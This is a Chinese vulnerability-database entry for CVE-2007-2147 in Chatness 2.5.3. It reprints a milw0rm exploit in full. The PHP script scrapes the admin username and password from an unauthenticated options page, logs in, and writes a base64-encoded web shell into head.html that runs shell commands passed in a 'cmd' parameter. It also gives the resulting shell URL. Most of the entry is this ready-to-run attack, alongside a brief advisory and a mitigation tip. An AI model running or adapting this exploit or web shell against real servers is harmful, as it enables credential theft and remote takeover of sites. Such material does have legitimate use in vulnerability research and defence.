Stephen Craton Chatness 'admin/options.php' 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112693 漏洞类型 未知
发布时间 2007-04-12 更新时间 2007-04-19
CVE编号 CVE-2007-2147 CNNVD-ID CNNVD-200704-379
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3725
https://www.securityfocus.com/bid/86314
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-379
|漏洞详情
StephenCraton(又称WiredPHP)Chatness的admin/options.php没有检查管理证书,存在权限许可和访问控制漏洞。远程攻击者可以借助直接请求,读取和修改classes/vars.php和classes/varstuff.php配置文件。
|漏洞EXP
<?/*
Files: options.php, save.php
Affects: Chatness <= 2.5.3
Date: 12th April 2007

Issue Description:
===========================================================================
Chatness suffers with two main vulnerabilities, the first of these in
/admin/options.php the problems occur because the script first fails to
verify if the user is in fact an administrator and secondly it prints the
administrators username and password in plain text as part of the pre-filled
form.

The second issue occurs in /admin/save.php and /index.php while save.php
limits writing to just .html extended filenames it is possible for an
attacker to overwrite either foot.html or head.html to contain arbitrary php
code which would then be executed when included by index.php
===========================================================================

Scope:
===========================================================================
Combined these two seperate issues will allow an attacker to gain access to
the system and execute code/commands of their choice.
===========================================================================

Recommendation:
===========================================================================
Until a patch is availible it would be advisable to chmod both foot.html
and head.html to a mode that makes them unwritable by the web server, this
will minimize the risk of arbitrary code execution.
===========================================================================

Discovered By: Gammarays
*/?>


<?php

echo "########################################################\n";
echo "#   Special Greetings To - Timq,Warpboy,The-Maggot     #\n";
echo "########################################################\n\n\n";

$payload = "JTNDJTNGcGhwK2lmJTI4aXNzZXQlMjglMjRfR0VUJTVCJTI3Y21kJTI3JTVEJTI5JTI5JTdCZWNobytzaGVsbF9leGVjJTI4dXJsZGVjb2RlJTI4JTI0X0dFVCU1QiUyN2NtZCUyNyU1RCUyOSUyOSUzQmRpZSUyOCUyOSUzQiU3RCUzRiUzRQ==";
$payload = base64_decode($payload);


if($argc!=2) die("Usage: <url> \n\tEx: http://www.example.com/chatness/\n");

$url = $argv[1];

$ch = curl_init($url . "admin/options.php");
if(!$ch) die("Error Initializing CURL");

echo "[ ] Attempting To Fetch Admin Login...\n";
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(!$res) die("Error Connecting To Target");

$httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult!=200) die("Error - URL Appears To Be Incorrect");

//Not good - but it works...sometimes
$junkarray = explode("id=",$res);
$junkarray = explode("\"",$junkarray[14]);
$username = $junkarray[3];

$junkarray = explode("id=",$res);
$junkarray = explode("\"",$junkarray[15]);
$password = $junkarray[3];

echo "[ ] Found Username And Password - ".$username." / ".$password."\n";
echo "[ ] Logging In...\n";

//Login
curl_setopt($ch, CURLOPT_URL,$url . "admin/login.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "mrcookie.dat");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"user=".$username."&pass=".$password."&submit=Login");
$res = curl_exec($ch);
if(!res) die("Error Connecting To Target");

$httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult==200) die("Error Invalid Username/Password");

echo "[ ] Login Succeeded..\n";

//Deploy Main Payload
curl_setopt($ch, CURLOPT_URL,$url . "admin/save.php?file=head");
curl_setopt($ch, CURLOPT_COOKIEFILE, "mrcookie.dat");
curl_setopt($ch, CURLOPT_POSTFIELDS,"html=".$payload);
$res = curl_exec($ch);
if(!res) die("Error Connecting To Target");

echo "[ ] Payload Deployed\n";
echo "[ ] Shell Accessible at ".$url."index.php?cmd=<yourcommand>";
curl_close($ch);
?>

# milw0rm.com [2007-04-12]
|受影响的产品
Stephen Craton Chatness 2.5.3
|参考资料

来源:BUGTRAQ
名称:20070412Chatness<=2.5.3-ArbitraryCodeExecution
链接:http://www.securityfocus.com/archive/1/archive/1/465547/100/0/threaded
来源:VUPEN
名称:ADV-2007-1386
链接:http://www.frsirt.com/english/advisories/2007/1386
来源:SECUNIA
名称:24873
链接:http://secunia.com/advisories/24873
来源:SREASON
名称:2595
链接:http://securityreason.com/securityalert/2595